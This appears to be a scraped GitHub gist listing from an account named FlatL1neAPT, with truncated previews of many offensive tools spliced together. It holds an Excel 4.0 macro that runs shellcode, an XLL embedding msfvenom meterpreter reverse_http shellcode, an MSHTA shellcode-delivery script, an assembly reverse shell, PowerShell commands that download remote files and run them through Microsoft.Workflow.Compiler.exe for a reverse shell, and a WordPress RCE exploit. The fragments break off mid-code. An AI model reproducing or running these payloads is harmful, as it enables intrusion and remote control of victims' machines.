FlatL1ne FlatL1neAPT
@FlatL1neAPT
FlatL1neAPT / shellcode.xlsm
Created May 28, 2019 17:46 — forked from Arno0x/shellcode.xlsm
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".
================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================
=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
@FlatL1neAPT
FlatL1neAPT / poc.png
Created May 21, 2019 21:30
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881
package main
import (
"fmt"
"net/http"
"strings"
)
@FlatL1neAPT
FlatL1neAPT / TestMSHTAShellcodeDelivery.ps1
Created April 11, 2019 06:40
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credits for CACTUSTORCH HERE
I was in escape sequence hell ;-)
' ( ) ( )
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
@FlatL1neAPT
FlatL1neAPT / VitaLoader.java
Created March 11, 2019 17:49 — forked from xerpi/Now has a repository
Ghidra Vita loader script
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
/*
* This script depends on the yamlbeans library.
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
@FlatL1neAPT
FlatL1neAPT / PowerShell_Command.txt
Created March 5, 2019 06:44 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@FlatL1neAPT
FlatL1neAPT / wordpress-rce.js
Created March 3, 2019 07:39 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);